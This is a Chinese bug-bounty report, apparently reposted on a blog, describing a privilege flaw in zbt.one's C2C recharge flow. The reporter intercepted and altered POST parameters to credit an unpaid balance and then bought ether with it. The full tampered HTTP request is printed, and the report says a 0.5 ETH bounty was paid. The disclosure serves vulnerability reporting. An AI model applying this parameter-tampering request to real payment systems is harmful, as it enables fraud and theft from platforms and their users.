漏洞URL:
https://zbt.one/c2c
简要描述:
RT 可以越权修改充值,然后居然会到账,也买了以太坊
漏洞证明:
首先在我的钱包,然后点击充值抓包

然后修改POST提交参数,如图所示

发送数据包

这时候点击确认已汇
不知道为什么过段时间就会自动到账

然后我购买了2个以太坊,

漏洞利用代码:
post数据包
POST /c2c/buy HTTP/1.1 Host: zbt.one User-Agent: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: https://zbt.one/c2c Content-Type: application/x-www-form-urlencoded Content-Length: 57 Cookie: Connection: close Upgrade-Insecure-Requests: 1 buyUnitPrice=6.5&buyNumber=11111111&cny_total=72222221.50
修复方案:
无
审核结果:
在审核时漏洞已无法复现,经双方协调,给予 0.5 ETH奖励
本文详细分析了ZBT.C2C平台存在的越权充值漏洞,通过修改POST提交参数,用户能够非法增加账户余额并购买以太坊。文章提供了漏洞利用的具体步骤及代码,并讨论了在审核过程中的修复情况。
13

被折叠的 条评论
为什么被折叠?



